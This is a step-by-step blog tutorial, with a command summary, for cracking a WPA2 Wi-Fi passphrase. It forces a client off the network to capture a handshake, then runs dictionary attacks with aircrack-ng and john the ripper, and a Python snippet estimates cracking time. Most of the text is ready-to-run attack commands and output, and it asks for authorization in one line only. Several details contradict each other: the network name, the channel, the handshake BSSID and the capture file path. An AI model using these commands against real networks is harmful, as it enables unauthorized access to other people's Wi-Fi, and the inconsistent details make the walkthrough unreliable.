If you want to read up on virtual consoles, see my post linked in this sentence.
tl;dr is posted at the bottom (for those of you just wanting the commands)

Now the fun stuff:

ONE: Find your wireless interface
airmon-ng

This will display available interfaces capable of monitoring mode

TWO: Put it into “monitoring” mode
airmon-ng start wlan0

If you get a warning about programs potentially interfering, all I can suggest is to try the next step first. If the next step fails, try killing the listed processes. Personally, I used Virtual Terminals 1-3 and killed everything with prejudice. You don’t have to do this, it just made me feel cool.

My monitoring interface was named wlan0mon.

THREE: Monitor to grab a BSSID and channel.
airodump-ng wlan0mon

You’ll see some output like this:

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 24:A0:55:72:22:46  -56     1154     2971    0   9  54e  WPA2 CCMP   PSK  haxor_me
 20:22:20:F2:FA:EE  -76      712       75    0   6  54e  WPA2 CCMP   PSK  prettyflyforawifi

My home network is pentest_me, with a BSSID of 24:A0:55:72:22:46
Please make sure this is your intended and authorized target.

FOUR: Start capturing
airodump-ng -c 9 --bssid 24:A0:55:72:22:46 -w ~/wireless/haxor_me wlan0mon

Broken down: airodump-ng -c CHANNEL --bssid BSSID -w OUTPUT_PREFIX INTERFACE (note that -w takes a file prefix, so ~/wireless/haxor_me produces files named haxor_me-01.cap and so on in ~/wireless)

You will get a screen that looks something like this:

CH  6 ][ Elapsed: 6 mins ][ 2015-11-27 00:28
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 24:A0:55:72:22:46  -74 100     3154      292    0   9  54e  WPA2 CCMP   PSK  haxor_me
BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 24:A0:55:72:22:46  88:63:D1:C4:11:D2   -1    1e- 0      0        7

This should create four files. Don’t exit this screen! It needs to keep running so your capture keeps growing. You will run aircrack-ng on those files later, but first you need to:

FIVE: Capture an authentication handshake.
aireplay-ng -0 1 -a 24:A0:55:72:22:46 -c 88:63:D1:C4:11:D2 wlan0mon

Broken down: -0 means deauth; the number following it is how many deauth packets to send to the client. I only need one handshake, so I chose one.
-a is the router’s BSSID. This is the same BSSID you used with airodump-ng.
-c is the client’s MAC address. Client addresses show up in the terminal/window where your capture is running.

In the capturing window, clients (or stations) show up in the bottom portion of the window. You want the MAC address from the STATION column.

Once you send the deauth (or you can wait patiently for someone to connect normally), you should hopefully see this in the top right corner of your capture window:
CH 6 ][ Elapsed: 16 mins ][ 2015-11-27 00:39 ] [ WPA Handshake: A8:24:45:C8:08:54

That WPA Handshake bit is what you’re looking for. As soon as you get that you can shut down the capture and start cracking.

SIX: Get cracking!
aircrack-ng -a2 -b 24:A0:55:72:22:46 -w /usr/share/wordlists/rockyou.txt ~/wireless/haxor_me/*.cap

Broken down:
-a
Force the attack mode, 1 or wep for WEP and 2 or wpa for WPA-PSK.
-b or --bssid
Select the target network based on the access point MAC address.
-w
Path to a dictionary file for wpa cracking. Specify “-” to use stdin.

As I ran it, the command works through the rockyou wordlist included with Kali and then stops.

That’s all fun and games, but what if we want to do some word-mangling? Well that line that says ‘Specify “-” to use stdin’ looks like it might pair nicely with this tidbit from the John the Ripper man pages:

-stdout[:LENGTH]
When used with a cracking mode, except for “single crack”, makes John print the words it generates to stdout instead of cracking.
While applying wordlist rules, the significant password length is assumed to be LENGTH, or unlimited by default.

To put those together:

john --wordlist=/usr/share/wordlists/rockyou.txt --rules=Single --stdout | aircrack-ng -a2 -b 24:A0:55:72:22:46 -w - ~/wireless/haxor_me/*.cap

Yay haxing!

                                 Aircrack-ng 1.2 rc2


                   [00:00:00] 1600 keys tested (4345.17 k/s)


                       KEY FOUND! [ snakepit1 ]


      Master Key     : E2 CA 4E ED 27 69 4E EE 2C 50 D1 AD AE 02 9D 89 
                       4F 3A 39 38 DA 87 72 0E 7E 40 CA 5C F4 32 B7 67 

      Transient Key  : 42 A0 1F EE 85 AC 06 64 08 57 22 7D 6B 42 0B 46 
                       0C F5 FD 91 0F 8C A8 02 E7 85 8C 66 25 FF 66 77 
                       A6 E7 C7 7A 73 75 3F E0 82 45 57 FA 5F CB 37 9F 
                       E7 7C AA 47 F6 4D A2 33 75 77 A4 EA D4 9A EE 01 

      EAPOL HMAC     : A1 24 41 C2 08 22 23 A7 E2 F0 C4 1C 11 46 21 C1
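What aircrack-ng is doing for every wordlist candidate is deriving the PMK (the “Master Key” line above) with PBKDF2-HMAC-SHA1 over the passphrase and SSID, then checking it against the captured handshake; that 4096-iteration derivation is what bounds the k/s figure. The following is an added Python example, not part of the original post or the aircrack-ng project: it reproduces the PMK derivation against the published IEEE 802.11i test vector (passphrase "password", SSID "IEEE") and uses the rate from the output above (read as keys per second) to estimate how long a full wordlist or a random passphrase keyspace takes, which is the number that tells you whether your own PSK is safe. The rockyou line count is an approximate assumption.

```python
import hashlib

# WPA2-Personal derives the 256-bit PMK (aircrack-ng's "Master Key") from the
# passphrase and SSID with PBKDF2-HMAC-SHA1, 4096 iterations (IEEE 802.11i).
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Return the PMK a cracker must compute for each candidate passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, PMK_LEN)


def format_master_key(pmk: bytes) -> str:
    """Render a PMK the way aircrack-ng prints its 'Master Key' line."""
    return " ".join(f"{b:02X}" for b in pmk)


def seconds_to_exhaust(keyspace: float, keys_per_second: float) -> float:
    """Worst-case time to try every candidate at the observed cracking rate."""
    return keyspace / keys_per_second


def random_keyspace(alphabet_size: int, length: int) -> int:
    """Number of passphrases of a given length over a given alphabet."""
    return alphabet_size ** length


# Rate taken from the aircrack-ng output above: 4345.17 keys per second.
OBSERVED_RATE = 4345.17
# Approximate line count of Kali's rockyou.txt (assumption, about 14.3 million).
ROCKYOU_SIZE = 14_344_392

if __name__ == "__main__":
    # Published IEEE 802.11i Annex test vector: passphrase "password", SSID "IEEE".
    print("PMK:", format_master_key(derive_pmk("password", "IEEE")))
    secs = seconds_to_exhaust(ROCKYOU_SIZE, OBSERVED_RATE)
    print(f"whole rockyou list at observed rate: {secs / 60:.0f} minutes")
    years = seconds_to_exhaust(random_keyspace(62, 12), OBSERVED_RATE) / (3600 * 24 * 365)
    print(f"random 12-char alphanumeric passphrase: {years:.2e} years")
```

The takeaway for the defender: a passphrase that appears in a public wordlist falls in under an hour at this CPU rate, while a random 12-character alphanumeric one is out of reach by many orders of magnitude.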

tl;dr

airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 9 --bssid 24:A0:55:72:22:46 -w ~/wireless/haxor_me wlan0mon
aireplay-ng -0 1 -a 24:A0:55:72:22:46 -c 88:63:D1:C4:11:D2 wlan0mon
aircrack-ng -a2 -b 24:A0:55:72:22:46 -w /usr/share/wordlists/rockyou.txt ~/wireless/haxor_me/*.cap
john --wordlist=/usr/share/wordlists/rockyou.txt --rules=Single --stdout | aircrack-ng -a2 -b 24:A0:55:72:22:46 -w - ~/wireless/haxor_me/*.cap

Cracking WPA2 Using airmon-ng, airodump-ng, aircrack-ng, and john the ripper